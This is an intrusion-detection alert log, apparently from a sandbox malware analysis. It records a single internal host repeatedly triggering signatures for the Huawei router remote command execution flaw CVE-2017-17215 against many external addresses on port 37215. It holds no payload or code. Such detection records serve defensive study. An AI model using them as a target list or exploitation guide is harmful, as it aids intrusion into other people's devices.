                                                        06/13/24-21:33:09.101929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3621437215192.168.2.14156.193.87.41
                                                        06/13/24-21:33:05.010636TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3892637215192.168.2.14197.93.142.17
                                                        06/13/24-21:33:02.914560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5036837215192.168.2.1441.61.254.171
                                                        06/13/24-21:32:25.971231TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5643437215192.168.2.14197.51.220.172
                                                        06/13/24-21:31:57.136091TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4257637215192.168.2.14156.98.225.29
                                                        06/13/24-21:32:21.787204TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3379037215192.168.2.14197.234.88.112
                                                        06/13/24-21:32:05.369294TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4233837215192.168.2.14197.134.98.6
                                                        06/13/24-21:32:05.345883TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5917837215192.168.2.14156.4.145.186
                                                        06/13/24-21:32:11.507348TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4721437215192.168.2.14156.160.72.159
                                                        06/13/24-21:32:15.603671TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4003837215192.168.2.14197.78.234.76
                                                        06/13/24-21:32:25.995941TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5803437215192.168.2.14156.158.175.28
                                                        06/13/24-21:33:17.305749TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4459437215192.168.2.1441.213.126.245
                                                        06/13/24-21:32:40.357699TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5782037215192.168.2.14197.15.123.88
                                                        06/13/24-21:33:07.042221TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5902237215192.168.2.14156.12.117.142
                                                        06/13/24-21:32:54.724904TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3483237215192.168.2.14156.2.102.213
                                                        06/13/24-21:33:05.013691TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4599637215192.168.2.1441.59.116.84
                                                        06/13/24-21:33:07.039777TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3779437215192.168.2.14156.92.185.37
                                                        06/13/24-21:33:09.111721TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3292237215192.168.2.1441.216.173.190
                                                        06/13/24-21:33:05.016053TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4294637215192.168.2.14156.46.232.247
                                                        06/13/24-21:33:13.227634TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5056637215192.168.2.14197.144.183.201
                                                        06/13/24-21:32:58.820289TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3845037215192.168.2.14197.46.100.117
                                                        06/13/24-21:32:13.566525TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3773437215192.168.2.1441.129.203.151
                                                        06/13/24-21:32:15.629832TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3591237215192.168.2.1441.7.8.225
                                                        06/13/24-21:32:23.831043TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5748837215192.168.2.14197.157.76.196
                                                        06/13/24-21:33:15.253384TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4500237215192.168.2.14156.174.19.200
                                                        06/13/24-21:32:13.565576TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3541237215192.168.2.14197.144.125.241
                                                        06/13/24-21:32:23.834905TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5124637215192.168.2.14197.78.74.38
                                                        06/13/24-21:32:54.711163TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3929837215192.168.2.14197.163.254.154
                                                        06/13/24-21:32:50.614305TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4854837215192.168.2.1441.190.120.2
                                                        06/13/24-21:32:03.274149TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4728037215192.168.2.1441.139.66.154
                                                        06/13/24-21:33:09.109077TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5233037215192.168.2.14156.144.120.38
                                                        06/13/24-21:32:09.440121TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4553637215192.168.2.14197.225.71.137
                                                        06/13/24-21:32:30.095814TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5478437215192.168.2.14156.37.245.0
                                                        06/13/24-21:33:15.257154TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4306437215192.168.2.1441.245.1.2
                                                        06/13/24-21:32:40.376784TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3607037215192.168.2.1441.140.210.56
                                                        06/13/24-21:33:13.230449TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6054437215192.168.2.14156.233.76.58
                                                        06/13/24-21:32:30.076929TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3463437215192.168.2.1441.218.243.188
                                                        06/13/24-21:33:13.211026TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5233637215192.168.2.1441.141.94.163
                                                        06/13/24-21:32:13.569653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5164037215192.168.2.1441.93.38.43
                                                        06/13/24-21:31:57.132009TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3684037215192.168.2.1441.109.66.1
                                                        06/13/24-21:33:07.041937TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4919837215192.168.2.14156.52.55.77
                                                        06/13/24-21:32:17.696425TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5587637215192.168.2.14156.20.236.52
                                                        06/13/24-21:32:28.043975TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5046637215192.168.2.14156.58.34.91
                                                        06/13/24-21:32:42.407077TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3506437215192.168.2.1441.209.213.218
                                                        06/13/24-21:33:13.213451TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3302637215192.168.2.14156.63.91.75
                                                        06/13/24-21:32:19.752309TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5344437215192.168.2.14156.197.247.131
                                                        06/13/24-21:32:38.322335TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4038437215192.168.2.1441.11.6.12
                                                        06/13/24-21:32:42.422726TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3866237215192.168.2.1441.62.110.146
                                                        06/13/24-21:32:32.165315TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4483037215192.168.2.14156.24.35.120
                                                        06/13/24-21:32:40.375624TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5186437215192.168.2.1441.147.10.226
                                                        06/13/24-21:33:15.275775TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4043637215192.168.2.14156.82.49.248
                                                        06/13/24-21:32:32.168653TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5718237215192.168.2.1441.173.59.118
                                                        06/13/24-21:33:02.936277TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5949437215192.168.2.1441.226.173.212
                                                        06/13/24-21:32:21.783868TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6093637215192.168.2.1441.141.3.21
                                                        06/13/24-21:32:09.439045TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4820037215192.168.2.14156.105.140.176
                                                        06/13/24-21:32:42.403403TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6021237215192.168.2.14197.94.153.38
                                                        06/13/24-21:32:03.308357TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3967037215192.168.2.1441.188.192.12
                                                        06/13/24-21:32:48.551910TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3887037215192.168.2.1441.97.252.96
                                                        06/13/24-21:32:23.833061TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3346237215192.168.2.1441.82.203.184
                                                        06/13/24-21:31:59.176590TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4428637215192.168.2.14156.195.196.140
                                                        06/13/24-21:32:13.565412TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5284837215192.168.2.14197.239.175.2
                                                        06/13/24-21:32:42.407931TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4778637215192.168.2.14156.42.248.156
                                                        06/13/24-21:32:11.508383TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4952037215192.168.2.14197.219.130.225
                                                        06/13/24-21:32:28.026547TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5644037215192.168.2.14197.32.49.192
                                                        06/13/24-21:32:42.405600TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4383237215192.168.2.14156.217.143.137
                                                        06/13/24-21:32:54.726285TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4823437215192.168.2.1441.165.226.39
                                                        06/13/24-21:32:42.417648TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4374237215192.168.2.14156.181.91.90
                                                        06/13/24-21:32:58.824365TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3705837215192.168.2.14156.212.247.40
                                                        06/13/24-21:33:15.272082TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5022037215192.168.2.14197.83.158.82
                                                        06/13/24-21:33:02.936686TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4681437215192.168.2.14197.29.84.164
                                                        06/13/24-21:33:02.911151TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4071637215192.168.2.1441.235.245.157
                                                        06/13/24-21:32:25.973162TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4247437215192.168.2.1441.185.200.112
                                                        06/13/24-21:32:52.655320TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4682237215192.168.2.14156.147.181.0
                                                        06/13/24-21:32:50.633141TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4576637215192.168.2.1441.73.232.167
                                                        06/13/24-21:33:09.130581TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3483037215192.168.2.1441.248.142.250
                                                        06/13/24-21:33:02.954911TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3423637215192.168.2.14156.45.60.162
                                                        06/13/24-21:32:21.782810TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3595637215192.168.2.14156.192.238.209
                                                        06/13/24-21:33:02.936360TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3890437215192.168.2.14197.201.32.24
                                                        06/13/24-21:32:32.152411TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3548237215192.168.2.1441.8.36.127
                                                        06/13/24-21:32:44.453901TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946037215192.168.2.14197.216.99.35
                                                        06/13/24-21:32:13.564084TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4920637215192.168.2.1441.85.113.43
                                                        06/13/24-21:32:28.028182TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3371637215192.168.2.1441.113.32.115
                                                        06/13/24-21:32:30.075503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4946837215192.168.2.14197.199.76.242
                                                        06/13/24-21:32:44.454593TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3439837215192.168.2.14197.85.178.19
                                                        06/13/24-21:33:09.090963TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5234237215192.168.2.14156.223.90.25
                                                        06/13/24-21:31:57.135920TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5098237215192.168.2.1441.115.248.106
                                                        06/13/24-21:32:32.152534TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3645837215192.168.2.14197.141.136.21
                                                        06/13/24-21:32:15.633377TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4345437215192.168.2.1441.52.131.140
                                                        06/13/24-21:32:32.154751TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3362837215192.168.2.1441.14.245.186
                                                        06/13/24-21:32:34.194795TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5508837215192.168.2.1441.225.75.4
                                                        06/13/24-21:33:11.174664TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4421237215192.168.2.14156.229.105.34
                                                        06/13/24-21:33:02.914115TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4322437215192.168.2.14197.57.232.34
                                                        06/13/24-21:32:56.757993TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5826037215192.168.2.14197.233.173.76
                                                        06/13/24-21:32:07.403450TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5099037215192.168.2.14156.96.32.19
                                                        06/13/24-21:33:11.159477TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3380637215192.168.2.14197.18.162.9
                                                        06/13/24-21:33:13.214549TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5654237215192.168.2.1441.226.162.161
                                                        06/13/24-21:32:17.694823TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5691037215192.168.2.14156.102.249.246
                                                        06/13/24-21:33:05.012355TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6022637215192.168.2.14197.165.135.38
                                                        06/13/24-21:32:13.569538TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4212437215192.168.2.14156.89.174.68
                                                        06/13/24-21:32:03.275972TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5961437215192.168.2.14156.105.185.32
                                                        06/13/24-21:32:30.095148TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5443237215192.168.2.14156.43.180.52
                                                        06/13/24-21:32:34.192095TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3741237215192.168.2.14156.135.220.133
                                                        06/13/24-21:33:13.212660TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3913237215192.168.2.1441.244.186.69
                                                        06/13/24-21:32:52.658189TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3628237215192.168.2.14156.60.71.13
                                                        06/13/24-21:32:54.725389TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3979637215192.168.2.1441.49.94.137
                                                        06/13/24-21:32:32.166805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4435037215192.168.2.14197.183.35.161
                                                        06/13/24-21:33:09.112372TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4665237215192.168.2.1441.103.165.181
                                                        06/13/24-21:33:13.229051TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4834037215192.168.2.1441.147.23.70
                                                        06/13/24-21:32:15.606039TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4589037215192.168.2.1441.209.213.96
                                                        06/13/24-21:33:09.109437TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4876637215192.168.2.14197.129.5.89
                                                        06/13/24-21:32:34.200047TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3756237215192.168.2.14197.251.96.156
                                                        06/13/24-21:32:50.611738TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5912837215192.168.2.14197.162.58.122
                                                        06/13/24-21:32:15.607760TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5927437215192.168.2.14197.182.19.224
                                                        06/13/24-21:32:25.973238TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5090837215192.168.2.1441.49.159.234
                                                        06/13/24-21:32:48.554155TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3508237215192.168.2.1441.80.27.112
                                                        06/13/24-21:32:11.510021TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3984037215192.168.2.14197.179.143.211
                                                        06/13/24-21:32:36.248044TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4567637215192.168.2.1441.137.124.62
                                                        06/13/24-21:32:40.379336TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3764837215192.168.2.14156.207.216.147
                                                        06/13/24-21:32:07.417751TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3503037215192.168.2.14156.78.229.213
                                                        06/13/24-21:32:23.833977TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3428037215192.168.2.14197.184.60.213
                                                        06/13/24-21:32:32.154950TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5421637215192.168.2.14156.56.233.227
                                                        06/13/24-21:32:50.629201TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4826437215192.168.2.14197.107.153.13
                                                        06/13/24-21:33:13.210596TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3561637215192.168.2.14156.126.58.6
                                                        06/13/24-21:32:40.379980TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5906237215192.168.2.14197.85.71.34
                                                        06/13/24-21:31:59.195961TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4407037215192.168.2.1441.74.74.126
                                                        06/13/24-21:32:11.484604TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3698237215192.168.2.14197.216.16.182
                                                        06/13/24-21:32:13.547499TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5370837215192.168.2.14156.148.171.143
                                                        06/13/24-21:32:09.440957TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5713037215192.168.2.1441.50.52.157
                                                        06/13/24-21:32:30.097377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4447037215192.168.2.14156.101.246.18
                                                        06/13/24-21:32:54.724818TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3559837215192.168.2.14197.247.85.227
                                                        06/13/24-21:32:58.821069TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4021037215192.168.2.14156.224.187.129
                                                        06/13/24-21:33:07.058557TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3945437215192.168.2.14197.7.248.51
                                                        06/13/24-21:32:40.353828TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3654037215192.168.2.1441.235.47.69
                                                        06/13/24-21:32:09.457805TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5396837215192.168.2.1441.42.242.180
                                                        06/13/24-21:32:11.487139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4283637215192.168.2.1441.17.64.57
                                                        06/13/24-21:33:11.158116TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3490637215192.168.2.14156.41.195.39
                                                        06/13/24-21:32:25.974480TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5376637215192.168.2.14197.245.231.178
                                                        06/13/24-21:33:07.055955TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5723637215192.168.2.14156.169.128.73
                                                        06/13/24-21:32:38.301262TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3849237215192.168.2.14197.179.18.54
                                                        06/13/24-21:31:59.197560TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4035237215192.168.2.14197.180.35.86
                                                        06/13/24-21:32:38.315960TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5794837215192.168.2.1441.252.211.28
                                                        06/13/24-21:32:56.757293TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3975437215192.168.2.1441.57.217.235
                                                        06/13/24-21:32:52.679625TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6031437215192.168.2.14156.95.249.161
                                                        06/13/24-21:32:25.972328TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3389437215192.168.2.1441.168.19.166
                                                        06/13/24-21:32:07.419782TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3417037215192.168.2.14156.143.137.119
                                                        06/13/24-21:33:00.869718TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4877437215192.168.2.1441.237.126.45
                                                        06/13/24-21:33:02.913377TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3819437215192.168.2.14156.146.156.173
                                                        06/13/24-21:32:52.676286TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4614037215192.168.2.1441.99.109.183
                                                        06/13/24-21:32:05.370139TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3899837215192.168.2.1441.157.34.139
                                                        06/13/24-21:32:23.836941TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5987237215192.168.2.14197.210.152.131
                                                        06/13/24-21:32:17.695492TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4995437215192.168.2.14197.156.134.218
                                                        06/13/24-21:33:13.212300TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4453037215192.168.2.14156.125.12.46
                                                        06/13/24-21:32:40.374982TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3480637215192.168.2.1441.183.137.147
                                                        06/13/24-21:32:07.402348TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4817437215192.168.2.1441.18.144.233
                                                        06/13/24-21:33:09.102145TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4457437215192.168.2.1441.7.155.58
                                                        06/13/24-21:32:58.822613TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5381637215192.168.2.1441.60.121.20
                                                        06/13/24-21:31:57.091503TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4778437215192.168.2.14156.253.22.172
                                                        06/13/24-21:32:40.373289TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5312437215192.168.2.1441.41.133.27
                                                        06/13/24-21:32:03.276461TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4034437215192.168.2.1441.31.232.127
                                                        06/13/24-21:32:17.677085TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5140437215192.168.2.14156.155.63.255
                                                        06/13/24-21:32:11.488750TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4639237215192.168.2.14156.45.45.115
                                                        06/13/24-21:32:15.629257TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5742037215192.168.2.14156.220.16.6
                                                        06/13/24-21:32:52.679755TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4836237215192.168.2.1441.57.119.62
                                                        06/13/24-21:32:19.727744TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)6077437215192.168.2.14197.105.0.252
                                                        06/13/24-21:33:05.013228TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4769637215192.168.2.14197.30.127.116
                                                        06/13/24-21:33:00.889712TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3322437215192.168.2.14197.164.95.12
                                                        06/13/24-21:33:15.273504TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5314637215192.168.2.14156.240.10.247
                                                        06/13/24-21:32:28.048149TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5965837215192.168.2.1441.3.198.63
                                                        06/13/24-21:32:15.610803TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4796237215192.168.2.1441.93.131.184
                                                        06/13/24-21:32:48.573382TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4118437215192.168.2.14156.250.23.27
                                                        06/13/24-21:32:25.971541TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4266637215192.168.2.14197.232.225.124
                                                        06/13/24-21:32:23.941623TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4042237215192.168.2.14197.212.89.116
                                                        06/13/24-21:32:42.421368TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)4725437215192.168.2.14197.130.159.241
                                                        06/13/24-21:32:11.508321TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5609037215192.168.2.14197.174.143.130
                                                        06/13/24-21:32:48.573678TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3512037215192.168.2.14156.45.218.51
                                                        06/13/24-21:32:13.566186TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3952037215192.168.2.14197.131.203.255
                                                        06/13/24-21:32:13.546633TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5657237215192.168.2.14197.37.107.94
                                                        06/13/24-21:32:17.695385TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3925837215192.168.2.14197.15.119.201
                                                        06/13/24-21:33:17.308303TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3447837215192.168.2.1441.10.41.58
                                                        06/13/24-21:32:07.403773TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)3857637215192.168.2.1441.33.100.152
                                                        06/13/24-21:33:11.156371TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)3551637215192.168.2.14197.56.189.169
                                                        06/13/24-21:32:03.276329TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)4138237215192.168.2.14156.46.54.126
                                                        06/13/24-21:33:00.884660TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)5612037215192.168.2.1441.241.70.99
                                                        06/13/24-21:32:01.222661TCP2835222ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215)6072437215192.168.2.1441.224.22.165
                                                        06/13/24-21:32:17.671857TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5299837215192.168.2.14197.28.20.169
                                                        06/13/24-21:32:01.221070TCP2829579ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215)5864837215192.168.2.14197.33.238.134
